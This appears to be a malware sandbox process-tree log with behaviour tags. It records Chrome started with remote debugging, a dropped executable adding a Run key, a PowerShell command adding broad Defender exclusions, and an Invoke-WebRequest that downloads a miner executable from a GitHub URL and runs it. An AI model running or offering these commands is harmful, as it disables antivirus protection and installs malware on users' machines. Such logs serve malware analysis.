C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3192 /prefetch:17⤵
- Uses browser remote debugging
PID:8908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3240 /prefetch:17⤵
- Uses browser remote debugging
PID:2952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4440 /prefetch:17⤵
- Uses browser remote debugging
PID:10140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5188 /prefetch:87⤵PID:10532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5244 /prefetch:87⤵PID:8012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5196,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5312 /prefetch:87⤵PID:10400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5376 /prefetch:87⤵PID:1196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4220 /prefetch:87⤵PID:12656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=516,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5424 /prefetch:87⤵PID:7280
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064910101\lBiQciH.exe"C:\Users\Admin\AppData\Local\Temp\10064910101\lBiQciH.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:12700 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pdgebznlgy', 'C:\Users', 'C:\ProgramData'"5⤵PID:6728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pdgebznlgy', 'C:\Users', 'C:\ProgramData'"6⤵
- Command and Scripting Interpreter: PowerShell
PID:12396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe'"5⤵PID:2412
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
PID:6348
-
-
-
C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe"C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3424
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4784
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:2872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:452
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5448
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:12408 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd102⤵PID:13176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1776,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2160 /prefetch:32⤵PID:3816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2076 /prefetch:22⤵PID:232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2408,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:6256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3092 /prefetch:12⤵PID:6296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3108 /prefetch:12⤵PID:6304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4188 /prefetch:22⤵PID:6440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=2884,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4160 /prefetch:12⤵PID:6564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5428,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5452 /prefetch:12⤵PID:8304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5688,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4728 /prefetch:82⤵PID:8996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5792,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5832 /prefetch:82⤵PID:9304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=504,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5116 /prefetch:82⤵PID:12120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5256,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:12136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5580,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:12152
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"1⤵
- Executes dropped EXE
PID:7404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:9600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{8525131a-9876-4fef-90f2-de1ba3475201}\d883fe50-0491-44e1-a09d-494a30983a86.cmd"1⤵PID:11332
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11672
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11768
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11912
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11980
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12032
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12092
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:5700
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5028
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:2384
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12500
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12596
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12648
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12820
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4564
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9280
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9324
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9380
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9428
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9488
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9776
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9980
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10160
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:3032
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10996
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11052
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11444
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4352
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12192
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2272
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5768
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2284
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12960
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6204
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6568
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6620
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6664
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6700
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6808
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6756
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6836
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6888
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6936
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7036
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7080
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3700
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3124
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:5720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2840
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:5404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7260
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7296
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7340
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7452
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7536
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7724
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7796
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7884
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7920
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8024
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8068
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8160
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4728
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8544
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8500
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8456
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8400
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8352
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8292
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:3428
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:1556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:852
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8552
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8592
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8680
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8744
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8788
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8892
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9036
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9084
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9128
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9532
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9564
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9680
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9788
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9900
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10108
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:1144
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:1832
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10316
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10360
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10412
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10448
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10496
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10540
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10640
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10668
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10788
-
-
